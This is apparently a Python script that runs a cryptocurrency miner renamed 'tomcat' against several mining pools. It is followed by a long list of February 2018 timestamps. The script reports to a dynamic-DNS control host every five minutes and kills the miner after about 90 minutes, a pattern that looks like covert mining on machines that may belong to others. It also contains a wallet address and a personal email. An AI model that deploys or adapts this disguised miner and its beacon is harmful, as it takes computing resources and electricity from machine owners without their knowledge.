import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:01.596825
#2018-02-17 17:32:01.796729
#2018-02-17 19:20:04.521677
#2018-02-17 21:11:06.419752
#2018-02-17 22:54:06.416730
#2018-02-18 00:39:05.907355
#2018-02-18 02:30:08.350466
#2018-02-18 04:17:07.271809
#2018-02-18 06:07:05.257870
#2018-02-18 07:56:06.729751
#2018-02-18 09:45:07.410608
#2018-02-18 11:33:06.467732
#2018-02-18 13:19:03.618316
#2018-02-18 15:08:06.940620
#2018-02-18 16:56:04.382330
#2018-02-18 18:45:08.461123
#2018-02-18 20:33:04.225699
#2018-02-18 22:19:03.990978
#2018-02-19 00:08:05.256852
#2018-02-19 01:54:05.387876
#2018-02-19 03:41:04.791617
#2018-02-19 05:26:05.607260
#2018-02-19 07:15:05.243095
#2018-02-19 09:05:04.130271
#2018-02-19 10:53:07.960185
#2018-02-19 12:43:08.013429
#2018-02-19 14:31:06.499257
#2018-02-19 16:19:04.259322
#2018-02-19 18:07:09.200579
#2018-02-19 19:52:05.901210
#2018-02-19 21:39:02.162019
#2018-02-19 23:25:07.758696
#2018-02-20 01:12:06.328102
#2018-02-20 03:02:06.891173
#2018-02-20 04:51:05.059785
#2018-02-20 06:34:06.887468
#2018-02-20 08:19:06.361129
#2018-02-20 10:04:05.258035
#2018-02-20 11:48:07.827823
#2018-02-20 13:36:06.592173
#2018-02-20 15:21:10.003182
#2018-02-20 17:06:09.688307
#2018-02-20 18:53:08.566288
#2018-02-20 20:43:03.898929
#2018-02-20 22:27:01.625035
#2018-02-21 00:07:04.285868
#2018-02-21 01:52:02.108304
#2018-02-21 03:38:07.608518
#2018-02-21 05:27:04.202887
#2018-02-21 07:14:01.293077
#2018-02-21 09:00:01.819206
#2018-02-21 10:48:04.937709
#2018-02-21 12:35:08.440091
#2018-02-21 14:23:04.551345
#2018-02-21 16:10:05.054775
#2018-02-21 18:02:04.421586
#2018-02-21 19:48:08.727500
#2018-02-21 21:36:06.693138
#2018-02-21 23:24:04.352372
#2018-02-22 01:12:07.967563
#2018-02-22 02:58:07.180965
#2018-02-22 04:46:05.385532
#2018-02-22 06:33:01.279323
#2018-02-22 08:21:01.380619
#2018-02-22 10:08:05.963607
#2018-02-22 11:54:01.389229
#2018-02-22 13:41:09.764159
#2018-02-22 15:30:10.285078
#2018-02-22 17:16:08.821461
#2018-02-22 19:03:01.879517
#2018-02-22 20:53:08.571489
#2018-02-22 22:38:08.066191
#2018-02-23 00:27:02.023252
#2018-02-23 02:15:07.538692
#2018-02-23 04:03:03.566747
#2018-02-23 05:49:05.435689
#2018-02-23 07:37:07.167313
#2018-02-23 09:40:05.939998
#2018-02-23 11:44:07.678432
#2018-02-23 13:34:01.639931
#2018-02-23 15:19:09.125046
#2018-02-23 17:07:06.843617
#2018-02-23 18:35:05.193891
#2018-02-23 20:18:01.465268
#2018-02-23 21:53:01.330991
#2018-02-23 23:27:01.859887
#2018-02-24 01:05:03.666315
#2018-02-24 02:44:05.921383
#2018-02-24 04:21:06.947225
#2018-02-24 05:49:02.227935
#2018-02-24 07:23:06.465748
#2018-02-24 08:57:04.542766
#2018-02-24 10:27:06.932895
#2018-02-24 12:09:07.943509
#2018-02-24 13:40:04.970537
#2018-02-24 15:11:04.259441
#2018-02-24 16:45:03.277994
#2018-02-24 18:19:07.393197
#2018-02-24 19:49:01.969586
#2018-02-24 20:03:04.201210
#2018-02-24 21:22:07.379451
#2018-02-24 23:42:01.340794
#2018-02-25 01:48:07.443694
#2018-02-25 05:20:03.907923
#2018-02-25 11:34:01.681858